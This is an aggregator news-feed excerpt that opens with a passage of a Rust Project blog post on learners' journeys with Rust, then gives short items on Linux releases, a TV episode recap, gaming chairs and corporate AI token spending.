<p>"Besides the prototyping work, I also did coding-challenge-type stuff to get familiar with Rust for Advent of Code. [..] It eventually clicked to the point where I wasn't fighting with Rust, it was working for me. I had that experience other people describe: when I managed to get my program to fit with Rust, it worked. I didn't spend time debugging." -- Principal Software Engineer, large SaaS provider</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#letting-go-of-clone-guilt"></a>
Letting go of "clone guilt"</h4>
<p>Some learners arrive with the assumption that good Rust means zero clones, zero copies, lifetimes threaded through everything. They set the bar at optimal before they've learned how to write idiomatic Rust, and it makes the borrow checker feel harder than it needs to be at the outset.</p>
<blockquote>
<p>"On one of my first projects, I was like, 'I don't ever want to copy or clone anything,' so I carefully wove through all the lifetimes and got myself into a bit of a bind. Then I saw someone else just cloning the struct I was working with, and it was super cheap. Sometimes you can just clone and it's going to be okay." -- Researcher at a university</p>
</blockquote>
<p>The experienced Rust developers we spoke with consistently said the same thing: clone freely while you're learning, then optimize when you understand the problem. Rust's reputation for performance and correctness feeds this. Newcomers assume anything less than optimal is wrong before they've written a first working program, and clone guilt is how that shows up.</p>
<p>We think it could be an interesting area of future study to check into the patterns Rust programmers employ at different levels of experience and under which circumstances. One member of the Rust Vision doc team that's very experienced with Rust noted that there's kind of an "expected shape" they understand as passing the compiler. This knowledge influences how they approach writing code which wouldn't take that shape and they naturally find themselves understanding when to use so-called workarounds, such as passing around indices into arrays or <code>Vec</code>s.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#multi-paradigm-but-not-the-oop-some-are-used-to"></a>
Multi-paradigm, but not the OOP some are used to</h3>
<p>The Rust programming language is multi-paradigm, and how that lands depends on what you're coming from. We heard some that came from a functional background were delighted with digging into learning how much Rust inherits from that lineage. Some others noted that they and others on their teams struggled to unlearn the object-oriented style they'd come to use heavily in other languages like C++ and Java.</p>
<blockquote>
<p>"Developers coming from C++ tend to think object-oriented. I think that's a difference between C++ and Rust." -- Architect at Automotive OEM</p>
</blockquote>
<blockquote>
<p>"I had exactly that thing, where I would apply all my years of Java and JS thinking, where I could just create some object, not care about it, return it, have it sloshing around between various functions. Found myself reaching for these patterns and then being told 'no, you cannot do that'." -- Principal Engineer at a SaaS company</p>
</blockquote>
<p>Developers coming from functional programming had less to unlearn: strong typing, pattern matching, and an expression-oriented style were already familiar.</p>
<blockquote>
<p>"My background has been more functional programming, strong typing. That originated for me as a Lisper: once a Lisper, always a Lisper." -- Principal Software Engineer working on Rust tooling for safety-regulated industries</p>
</blockquote>
<blockquote>
<p>"The languages I primarily used before Rust were things like OCaml. Way back, I came from C and C++, the classic languages, and then I spent quite a long time doing primarily pure functional stuff. These days I've ended up back in what I like to think of as a pragmatic center ground [with Rust]." -- Fractional CTO</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#teaching-rust-in-academia"></a>
Teaching Rust in academia</h3>
<p>We spoke with a university professor that's been teaching Rust generally. In the academic environment, they were able to use proxies for some things such as "traits are like interfaces in Java" because the students had already gone through a set of courses in their first and second years that taught them Java. They introduced concepts slowly throughout the course, choosing to deal with some more complex topics like generics later. The outcome generally was that students had no problem picking up Rust in this setting.</p>
<blockquote>
<p>"I couldn't see any big difference on the embedded side. We also teach an embedded class, and we did an experiment. Half of the students' feedback was worse on the Rust class, mostly because they needed to build the project themselves. The C students just got one from [an LLM], absolutely no problem." -- University Professor, on teaching Rust</p>
</blockquote>
<p>The C cohort leaned on LLMs for the project in ways the Rust cohort couldn't. We don't yet have a clear answer for why.</p>
<p>What did come through clearly was the Rust cohort's experience with the community. Some students needed to figure out which drivers to use for the embedded project and how to use them. Their professor encouraged them to open issues and ask questions directly on GitHub, and the maintainers responded. Students who had never contributed to open source before were getting answers from the people who wrote the code.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-using-llms"></a>
Learning using LLMs</h3>
<p>Some experienced folks shared that they saw LLMs as a tool that can help someone come up to speed quickly, either as a research tool or for generating example Rust code to understand concepts.</p>
<blockquote>
<p>"I'm optimistic that there's a way to work [LLMs] in that will cut down that learning curve. One of the big things these tools bring is reducing the learning curve in general; these are very good tools to help you navigate a space that you don't know yet." -- Maintainer of large open source Rust crate</p>
</blockquote>
<blockquote>
<p>"I try [LLMs] out once a month, usually for generating an example or something like this. Just like with Stack Overflow: when you read an example, you should read it carefully and try to understand it. Not copy and paste it, but type it in your own words in code and then check it, because that's where the teeny tiny little mistakes are." -- Founder of startup built on Rust</p>
</blockquote>
<p>For some learners, an LLM is just another way to find answers, no different than a search engine.</p>
<blockquote>
<p>"So for the most part, picking up Rust - how do I learn? I'll [use web search for] things, I'll ask [an LLM], I'll just poke around and read the code." -- Senior Software Engineer working in a regulated space</p>
</blockquote>
<p>One founder went further and claimed that LLMs change who can become a Rust developer. One consulting company founder described hiring high school graduates with no systems programming background and training them as Rust developers, with LLMs filling in the learning gaps that would previously have required years of experience.</p>
<blockquote>
<p>"At the beginning, I was worried, but now that we have [LLMs] supporting development, the difficulty of the language doesn't matter. I'm seeing a huge opportunity behind strong runtime languages like Rust. [..] In [Developing Country] we hire 20-25 high school graduates, train them to be Rust programmers, then they enhance our workforce worldwide." -- Founder of a consulting company</p>
</blockquote>
<p>We heard this from one organization. This is a claim that the combination of Rust's compiler and LLM tooling can dramatically shorten the path from beginner to working developer. Whether it generalizes depends on questions we can't answer from a single interview: how long these developers stay, what kind of code they can maintain independently, and whether this training/learning model works outside this company's particular structure. If it holds up, the pool of people who can become Rust developers is much larger than the usual hiring profile suggests.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#organizational-considerations-for-rust-learners"></a>
Organizational considerations for Rust learners</h3>
<p>We spoke with a number of folks on teams that are using Rust in larger organizations. Teams wanted to know that everyone would end up at roughly the same level of competence, which led a good number to invest in training courses to get there. Some leaders found that staff was able to ramp well enough by reading The Rust Programming Language, going through Rustlings, and then picking up lower risk and priority tickets to work on. Having a sense of community was also important within companies; it helps people know they are not alone when they are asked to work on Rust after, say, a reorganization happens.</p>
<blockquote>
<p>"[..] the idea with the class as opposed to 'just read the Rust book on your own' was that this gives everyone kind of the same baseline going in."  -- Principal Firmware Engineer (mobile robotics)</p>
</blockquote>
<blockquote>
<p>"So typically we're going to have people work through Rustlings, work through The Rust Programming Language. We have them then start to pick up lower risk tickets to work on." -- Principal Engineer at a large SaaS provider</p>
</blockquote>
<blockquote>
<p>"We've got an internal Slack channel for Rust learning where people can drop questions and others will come in and answer them. That helps build up understanding and community." -- Software Engineer at a large corporation</p>
</blockquote>
<p>Some organizations found that while the person they'd hire would need to learn Rust, it was still preferable to the alternative of hiring someone for a critical piece of software written in another language.</p>
<blockquote>
<p>"They needed to grow and maintain this C++ codebase. They had a C++ wizard, and they tried for about two years to find someone with the same level of expertise. They ended up hiring people that didn't know Rust and ramping them up, creating FFI bindings from the C++ side so they could work in Rust. And you can feel it: the borrow checker is teaching these people the right way to handle their systems." -- Principal Engineer at an Automotive OEM</p>
</blockquote>
<p>The community and helping each other aspect seems to grow bonds as organizations mature.</p>
<blockquote>
<p>"Our team is [all about] mentorship. I've mentored people coming up to speed on Rust, and people help each other hugely." -- Principal Software Engineer at a large SaaS company</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#silent-attrition"></a>
Silent attrition</h3>
<p>We identified some cases where people have approached Rust and bounced off of it, for one reason or another. In the below case, someone with a background in a language with fewer guardrails found themselves frustrated enough with Rust to walk away.</p>
<blockquote>
<p>"All of that means that that embedded ecosystem is very frustrating to somebody who comes from C and is like, why can't I just get a pointer to this peripheral and then write into the registers. What are you doing to me? [..] My friend never got over that. He looked at it and said, I'm not going to deal with this and walked away." -– A second University Professor</p>
</blockquote>
<p>There may be language features that for a particular domain are not seen as comfortable or usable yet, such as async Rust usage in a safety domain. We'd like to map which language features feel off-limits in which domains; async in safety-critical work probably isn't the only case.</p>
<blockquote>
<p>"We're not fully sure how async [Rust] will work out in the long run in our domain. [..] People don't feel comfortable yet since C++14 doesn't provide such concepts. [..] It's the chicken-and-egg problem again: we probably need to gain some experience to see whether we can actually benefit from these new concepts in the automotive and safety domains." -- Team Lead at Automotive Supplier (ASIL D target)</p>
</blockquote>
<p>We heard in at least one case, that while the language was challenging and there was a near bounce, the tooling helped keep them coming back and trying.</p>
<blockquote>
<p>"Well, I think my early impressions of Rust - one is I find C++ so intimidating, and I think a big part of why I was able to succeed at [..] learning Rust is the tooling. I mean, all this makes sense [..] but it's like, for me, getting started with Rust, the language was challenging, but the tooling was incredibly easy." -- Founder of another startup built on Rust</p>
</blockquote>
<p>While it might be considered more of a community concern, if there are interactions online and in spaces that point to learners having
so-called "skill issues" this feeds into the narrative that Rust must be hard to learn. We may be unintentionally turning away Rust Project contributors and maintainers due to the vibes being put out when new learners show up in certain spaces.</p>
<blockquote>
<p>"People are very helpful, but generally the attitude is: if your program is very complicated, it's mostly a skill issue. There's not that much empathy when people get stuck learning, and a lot of people are just pushed away by it. There's probably a huge number of people who silently stop wanting to write Rust, because at some point it gets complicated and the feedback they get is 'you just need to be a better programmer, obviously'." -- Software Engineer at a SaaS Provider</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#feedback-on-near-bounces-from-survey"></a>
Feedback on near-bounces from survey</h4>
<p>We found a few interesting perspectives collected in the Rust Vision doc survey which we administered with examples of bouncing and coming back:</p>
<blockquote>
<p>"I started before 1.0, got stuck very soon when trying to translate patterns from C++ to Rust (due to borrow checking). I tried again after 1.0 and it stuck. [..]" -- Survey Respondent A</p>
</blockquote>
<p>Survey Respondent A went on to share in a more detailed response about a perceived weakness in Rust learning materials related to lifetimes and the borrow checker are explained. There was an observation that it's fairly easy to run into more complex situations with lifetimes and the borrow checker. They felt that the current state of this sort of material and tutorials is fairly superficial and can leave learners stuck when they run into those more complex situations.</p>
<p>One respondent that bounced once and came back shared challenges around usage of async. In concert with Rust's memory-safety and the borrow checker, they found some of the nitty-gritty details of async were difficult to learn. While we're aware of the Rust Project's continuous efforts to improve Rust's async story, this is another data point of a user that faced challenges.</p>
<p>Another survey respondent shared how they had multiple times bounced in trying to learn Rust. They returned after a year or so and found Rustlings to be highly motivating. We note that having multiple pathways for folks to learn Rust opens up more possibilities for those that nearly bounced, just like this person.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#need-more-focused-work-on-silent-attritrion"></a>
Need more focused work on silent attritrion</h4>
<p>The thing that stood out most to us was the lack of real, first-hand knowledge of having bounced when learning Rust. While this is an obvious effect of soliciting answers to our survey and opportunities to interview through Rust channels and our networks, this cohort is good future candidate where interviews could start.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#conclusions"></a>
Conclusions</h3>
<p>Across these conversations, the experience of learning Rust depended heavily on context. Why someone was learning and what support they had mattered as much as the borrow checker. The same kinds of examples kept coming up: a training course that got a team to a shared baseline, a maintainer answering a student's first GitHub issue, and a colleague whose code showed that cloning was okay.</p>
<p>That context is largely something the community has a hand in. With that in mind, here is what we take away from what we heard, and what we still don't know.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#what-seems-worth-trying"></a>
What seems worth trying</h4>
<p><strong>Learning materials aimed at unlearning.</strong> Syntax barely came up when people described their struggles. People struggled with unlearning habits from previous languages, whether OOP structuring from C++ and Java or the instinct to grab a raw pointer to a peripheral. Most of our learning materials teach Rust from first principles, and that works. What we didn't come across is much written for, say, the engineer with ten years of Java who lands on a Rust team after a reorg: material that names the patterns they'll reach for that won't transfer, and shows what to do instead. The professor we spoke with did a version of this in the classroom, leaning on "traits are like interfaces in Java" and saving generics for later in the course, and the students did fine. Something similar could work outside the classroom too.</p>
<p><strong>Put the "clone freely while you're learning" advice somewhere official.</strong> Every experienced developer we spoke with gave the same advice, but learners seem to mostly pick it up by accident, like the researcher who happened to see someone else cloning the struct they had been carefully threading lifetimes through. Saying it early in official materials would take some of the steepness out of the curve. The broader version belongs there too: idiomatic Rust doesn't have to mean optimal Rust, especially on a first project.</p>
<p><strong>Diagnostics are already a primary learning resource: several people told us the compiler taught them lifetimes before any documentation did.</strong> Diagnostics reach learners right at the moment they're stuck. When writing new ones, it seems worth keeping the confused newcomer in mind alongside the expert, because for a lot of people this is where the learning happens.</p>
<p><strong>Is "the book" actually out of date?</strong> Whether or not The Rust Programming Language or other materials are actually behind, a team evaluating Rust looked at its repository, saw unresolved issues and unmerged PRs, and moved on. As more companies evaluate adoption, more people will look at these materials with the same fresh eyes. Visible issue triage and some communication about what's current and what's planned would address the perception, separately from whatever content work may or may not be needed.</p>
<p><strong>How stuck learners get treated is shaping who stays.</strong> We heard about students getting answers on GitHub from the maintainers who wrote the code, and we heard about learners being told their struggles were a skill issue. The first group came away with a lasting good impression of Rust. Some of the second group walked away entirely, and because they leave quietly, it's easy to underestimate how many of them there are. The welcoming side of the community came up unprompted as a reason people stayed, so we know it makes a difference when we get this right.</p>
<p><strong>Every organization we spoke with described essentially the same ramp-up for bringing a team to Rust.</strong> Teams that brought groups of developers to Rust described roughly the same approach: get everyone to a shared baseline with a training course or with The Rust Programming Language and Rustlings, start people on lower-risk tickets, and give them somewhere internal to ask questions. Several organizations also found that hiring developers without Rust experience and ramping them up worked out better than continuing to search for rare expertise in another language. None of this is complicated, and teams weighing adoption don't need to invent a training program from scratch.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#what-we-still-don-t-know"></a>
What we still don't know</h4>
<p>The biggest gap is the people we didn't reach. Nearly everyone we spoke with stuck with Rust long enough to be reachable through Rust channels, so the stories of bouncing off came to us second-hand: a friend who walked away from embedded Rust, colleagues who quietly stopped after the responses they got. As we wrote in <a href="https://blog.rust-lang.org/2025/12/03/lessons-learned-from-the-rust-vision-doc-process/" rel="external">our first post</a>, finding people who decided against Rust takes targeted outreach. If the proposed User Research team comes together, talking with learners who bounced would make a good early project, and learning is probably the area where that research would teach us the most.</p>
<p>We also don't know what to make of LLMs as a learning tool yet. They came up as a search engine, as an example generator, and in one organization's case as something that makes training high school graduates into working Rust developers possible. We saw a classroom where the C cohort leaned on LLMs in ways the Rust cohort couldn't, and we don't have an explanation for it. All of this comes from a handful of conversations, so we treat it as a set of leads to follow up on. Given how quickly the tools are changing, it seems better to study this deliberately than to wait and see what folklore develops.</p>
<p>The folks we spoke with showed that people do get there: with enough passes through the materials and enough code written, it eventually clicks. The opportunities above are mostly about making it work for the people who didn't pick Rust on purpose, and for the ones who would have stuck around if their early experience had gone a little differently.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Distribution Release: StartOS 0.4.0]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  Aiden McClelland has announced the release of a major new version of StartOS, a Debian-based Linux distribution optimised for personal servers, available for AArch64, riscv64 and x86_64 architectures: "Version 0.4.0 is a complete r...]]></description>
<link>https://tsecurity.de/de/3692755/unix-server/distribution-release-startos-040/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692755/unix-server/distribution-release-startos-040/</guid>
<pubDate>Sat, 25 Jul 2026 01:45:40 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  Aiden McClelland has announced the release of a major new version of StartOS, a Debian-based Linux distribution optimised for personal servers, available for AArch64, riscv64 and x86_64 architectures: "Version 0.4.0 is a complete rewrite of StartOS. After six years of building, we believe we have arrived at the....]]></content:encoded>
</item>
<item>
<title><![CDATA[Distribution Release: Helwan Linux 5.0]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  Saeed Badreldin has announced the release of Helwan Linux 5.0, a significant update of the project's Arch-based distribution designed primarily for developers: "We are proud to announce the launch of Helwan Linux 5.0, a version tha...]]></description>
<link>https://tsecurity.de/de/3692511/unix-server/distribution-release-helwan-linux-50/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692511/unix-server/distribution-release-helwan-linux-50/</guid>
<pubDate>Fri, 24 Jul 2026 23:03:02 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  Saeed Badreldin has announced the release of Helwan Linux 5.0, a significant update of the project's Arch-based distribution designed primarily for developers: "We are proud to announce the launch of Helwan Linux 5.0, a version that marks a qualitative leap in our distribution philosophy and development. What's new....]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Sugar’ Season 2, Episode 6 Recap: John Sugar Faces His Darkest Choice Yet]]></title>
<description><![CDATA[Sugar Season 2, Episode 6 pushes John Sugar deeper into a dangerous conspiracy as Vega closes in on Ji Moon and refuses to leave any witnesses behind.




Episode title: “Cautionary Tale”



Release date: July 24, 2026



Genre: Crime drama, mystery, neo-noir and science fiction



Season length:...]]></description>
<link>https://tsecurity.de/de/3692419/ios-mac-os/sugar-season-2-episode-6-recap-john-sugar-faces-his-darkest-choice-yet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692419/ios-mac-os/sugar-season-2-episode-6-recap-john-sugar-faces-his-darkest-choice-yet/</guid>
<pubDate>Fri, 24 Jul 2026 21:47:51 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sugar Season 2, Episode 6 pushes John Sugar deeper into a dangerous conspiracy as Vega closes in on Ji Moon and refuses to leave any witnesses behind.




Episode title: “Cautionary Tale”



Release date: July 24, 2026



Genre: Crime drama, mystery, neo-noir and science fiction



Season length: Eight episodes



Season finale: August 7, 2026




Spoiler warning



The following section contains major spoilers from Sugar Season 2, Episode 6.



Sugar learns the truth about Operation Fire Sale



After hiding Ji Moon in a rehabilitation facility and arranging a fake death certificate, Sugar continues investigating the operation connected to Vega. He discovers that the conspiracy, known as Operation Fire Sale, extends far beyond the local drug trade.



The people behind the scheme plan to flood selected neighborhoods with cheap fentanyl. Once overdose deaths increase, someone inside the city alters the official records, allowing the victims to disappear from government systems. The group can then exploit housing grants and properties connected to those missing residents.



Sugar finally has evidence linking Vega to the operation. However, possessing the evidence does not immediately solve his problem because Vega remains determined to find Ji and silence him permanently.



Who is Peg Rosenthal?



The episode opens with a flashback from 11 years earlier, revealing the identity of the woman who has appeared in Sugar’s visions throughout the season.



Her name was Peg Rosenthal, another member of Sugar’s species who became deeply attached to human life. She enjoyed human food, relationships and money before becoming involved in financial crimes.



Sugar was ordered to collect Peg and send her home. During their journey, she warned him that becoming human was a slippery slope. Peg believed her actions had changed her so much that her people would never accept her again.



When Sugar briefly leaves to buy tissues, Peg covers herself and the vehicle in gasoline before taking her own life. Her death explains Sugar’s fear that his growing connection to humanity will eventually destroy him as well.



Sugar cannot bring himself to kill Vega



Sugar enters Vega’s apartment with a gun and appears ready to end the threat. However, he stops himself before pulling the trigger.



His hesitation becomes even more dangerous when Vega meets him later at the hotel bar. Sugar explains that Ji will remain silent, but Vega refuses to take the risk. He makes it clear that Ji cannot stay alive.



Sugar tells Vega that he had an opportunity to kill him earlier. Vega responds that Sugar should have taken it, leaving the two men heading toward an unavoidable confrontation.



Meanwhile, Sugar and Charlotte become closer, showing how quickly he continues to embrace human emotions and desires. With Ji still in hiding and Vega preparing his next move, Sugar has placed himself in too deep with nowhere safe left to go.



What do you think Sugar will do when Vega finally finds Ji? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mobile OS Release: UBports 24.04-2.0]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  The UBports project has published a new feature update, UBports 24.04-2.0 which introduces web browser updates and support for "notch" areas in output displays. "Ubuntu Touch 24.04-2.0 is a feature update under the same Ubuntu 24.0...]]></description>
<link>https://tsecurity.de/de/3692065/unix-server/mobile-os-release-ubports-2404-20/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692065/unix-server/mobile-os-release-ubports-2404-20/</guid>
<pubDate>Fri, 24 Jul 2026 18:32:57 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  The UBports project has published a new feature update, UBports 24.04-2.0 which introduces web browser updates and support for "notch" areas in output displays. "Ubuntu Touch 24.04-2.0 is a feature update under the same Ubuntu 24.04 base as the previous release. Nonetheless, this release contains exciting updates and....]]></content:encoded>
</item>
<item>
<title><![CDATA[Distribution Release: Shadowfetch Linux 2.0.0]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  The Shadowfetch Linux distribution is a Debian-based project which features the Plasma desktop. The latest release of Shadowfetch, version 2.0.0, enables automatic Btrfs snapshots prior to package changes, making rolling back to wo...]]></description>
<link>https://tsecurity.de/de/3691977/unix-server/distribution-release-shadowfetch-linux-200/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691977/unix-server/distribution-release-shadowfetch-linux-200/</guid>
<pubDate>Fri, 24 Jul 2026 18:02:21 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  The Shadowfetch Linux distribution is a Debian-based project which features the Plasma desktop. The latest release of Shadowfetch, version 2.0.0, enables automatic Btrfs snapshots prior to package changes, making rolling back to working snapshots easier. The project has also revamped its welcome screen. "Boot straight into a working....]]></content:encoded>
</item>
<item>
<title><![CDATA[I’ve been gaming for 40 years. Here are the best chairs in the UK for comfort, support and serious play]]></title>
<description><![CDATA[Whether you’re on PC or a console, level up your setup with our gaming expert’s pick of the best chairs• The best games of 2026 so farComfort is crucial to the gaming experience. It’s hard to focus on blasting aliens or taking Stoke to the Champions League final if your bum has gone to sleep beca...]]></description>
<link>https://tsecurity.de/de/3691779/it-nachrichten/ive-been-gaming-for-40-years-here-are-the-best-chairs-in-the-uk-for-comfort-support-and-serious-play/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691779/it-nachrichten/ive-been-gaming-for-40-years-here-are-the-best-chairs-in-the-uk-for-comfort-support-and-serious-play/</guid>
<pubDate>Fri, 24 Jul 2026 16:21:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Whether you’re on PC or a console, level up your setup with our gaming expert’s pick of the best chairs</p><p>• <a href="https://www.theguardian.com/culture/ng-interactive/2026/jun/11/the-best-games-of-2026-so-far"><strong>The best games of 2026 so far</strong></a></p><p>Comfort is crucial to the gaming experience. It’s hard to focus on blasting aliens or taking Stoke to the Champions League final if your bum has gone to sleep because you’ve been sitting on an old chair for three hours. We’re spending <a href="https://www.nytimes.com/2025/10/03/upshot/video-games-boys-young-men.html">more time playing games than ever before</a>, so good posture matters. If you have set up a dedicated gaming space, then a rickety seat just won’t cut it.</p><p>From luxurious ergonomic thrones to cheap-and-cheerful bucket seats, the options available are bewildering. So I set out on an epic quest: to find the most comfortable, durable and stylish gaming chairs. Here’s what I discovered.</p><p><strong>Best gaming chair overall:</strong><br>
 Secretlab Titan Evo</p><p><strong>Best budget gaming chair:</strong><br>
 ThunderX3 Solo 360</p> <a href="https://www.theguardian.com/thefilter/2026/jul/24/best-gaming-chairs-tested-uk">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Loop Engineering for RAG Generation: An LLM Cascade from a Cheap Local Model Up to a Hosted Flagship]]></title>
<description><![CDATA[Enterprise Document Intelligence [Vol.1 #8quater] - Two angles on the cascade, cost and a validation loop, backed by a real sweep of twenty local models against a hosted flagship
The post Loop Engineering for RAG Generation: An LLM Cascade from a Cheap Local Model Up to a Hosted Flagship appeared...]]></description>
<link>https://tsecurity.de/de/3691696/ai-nachrichten/loop-engineering-for-rag-generation-an-llm-cascade-from-a-cheap-local-model-up-to-a-hosted-flagship/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691696/ai-nachrichten/loop-engineering-for-rag-generation-an-llm-cascade-from-a-cheap-local-model-up-to-a-hosted-flagship/</guid>
<pubDate>Fri, 24 Jul 2026 15:34:53 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise Document Intelligence [Vol.1 #8quater] - Two angles on the cascade, cost and a validation loop, backed by a real sweep of twenty local models against a hosted flagship</p>
<p>The post <a href="https://towardsdatascience.com/loop-engineering-for-rag-generation-an-llm-cascade-from-a-cheap-local-model-up-to-a-hosted-flagship/">Loop Engineering for RAG Generation: An LLM Cascade from a Cheap Local Model Up to a Hosted Flagship</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting a grip on shadow tokens and AI blowouts]]></title>
<description><![CDATA[Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and a clear case study in how limited oversight snowbal...]]></description>
<link>https://tsecurity.de/de/3691453/it-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691453/it-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</guid>
<pubDate>Fri, 24 Jul 2026 14:04:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and <a href="https://www.forbes.com/sites/janakirammsv/2026/05/17/uber-burns-its-2026-ai-budget-in-four-months-on-claude-code/">a clear case study</a> in how limited oversight snowballs into an AI blowout.</p>



<p class="wp-block-paragraph">This is a phenomenon I like to call “shadow tokens” — AI credits paid for by the company but largely invisible to decision-makers. Too many engineers have the final say over how much they consume and, therefore, what it costs. This all-you-can-eat attitude is part of the reason why <a href="https://www.theverge.com/tech/930447/microsoft-claude-code-discontinued-notepad">Microsoft is reportedly</a> winding down many internal licenses across key engineering teams and why <a href="https://www.thestreet.com/investing/the-next-phase-of-ai-spending-is-already-underway">one in five organizations</a> is missing its AI spend forecast by more than 50%.</p>



<p class="wp-block-paragraph">And the trend is only accelerating. By 2028, <a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html">Gartner predicts</a> that AI coding costs (driven by this kind of ungoverned consumption) will be as much per developer as the salary companies pay that person.</p>



<p class="wp-block-paragraph">LLMs and agents introduce a new class of variable cost that scales with behavior rather than headcount, putting enterprises on the hook for tools that balloon with workload. I don’t see this as enterprises overspending because they’re reckless — it’s down to a lack of managerial oversight, budget alignment that demands a proven return on investment, and engineer education on how much is too much.</p>



<p class="wp-block-paragraph">Going forward, CIOs need to thread the AI needle between governance that encourages transparency and reasonable spend without stifling innovation.</p>



<h2 class="wp-block-heading">When shadow tokens result in real costs</h2>



<p class="wp-block-paragraph">The issue is that AI isn’t a traditional line item. Previously, enterprise leaders onboarded software-as-a-service (SaaS) with a good idea of the total cost. An allocated software seat or annual contract was a known quantity. The cloud added some variation (with fluctuations depending on hosting size), but instances were still modelable. AI flips this status quo on its head — the unit of consumption is behavior and the cost is exponential.</p>



<p class="wp-block-paragraph">And these specifics aren’t immediately apparent at pilot. Tools can appear inexpensive in controlled experiments yet unpredictably scale depending on session length, context window size, model selection and whether agents run in parallel. This is the fallacy of the $20-per-seat enterprise plan — tokens are charged separately at API rates with no ceiling. The final dollar value of any session is set by factors that finance can’t always model in advance, particularly when these decisions usually rest with the engineers themselves.</p>



<p class="wp-block-paragraph">According to <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html">Deloitte</a>, only 21% of organizations deploying agents have a mature governance model, a real concern because they’re token-eating machines. This is what was happening at Uber — Claude Code in agentic mode was autonomously reading codebases, planning changes across dozens of files and opening pull requests. Each step quickly adds up, with Anthropic’s own documentation noting that agents consume approximately seven times as many tokens as standard sessions.</p>



<p class="wp-block-paragraph">This is shadow IT and shadow AI, evolved. This time, however, many leaders approved the tool in question without guardrails governing consumption. AI hype adds fuel to the fire and normalizes long sessions. Uber’s CTO, for example, <a href="https://x.com/praveenTweets/status/2033627282418655711">described</a> a company-wide shift toward “agentic software engineering” with employees “who are quietly experimenting, quietly shipping and quietly pushing things forward”. This is an exciting way to test the limits of what’s possible, certainly, but it’s also a position that goes a long way to explaining how the company spent its annual AI budget by April.</p>



<h2 class="wp-block-heading">Shifting the culture from usage to yield</h2>



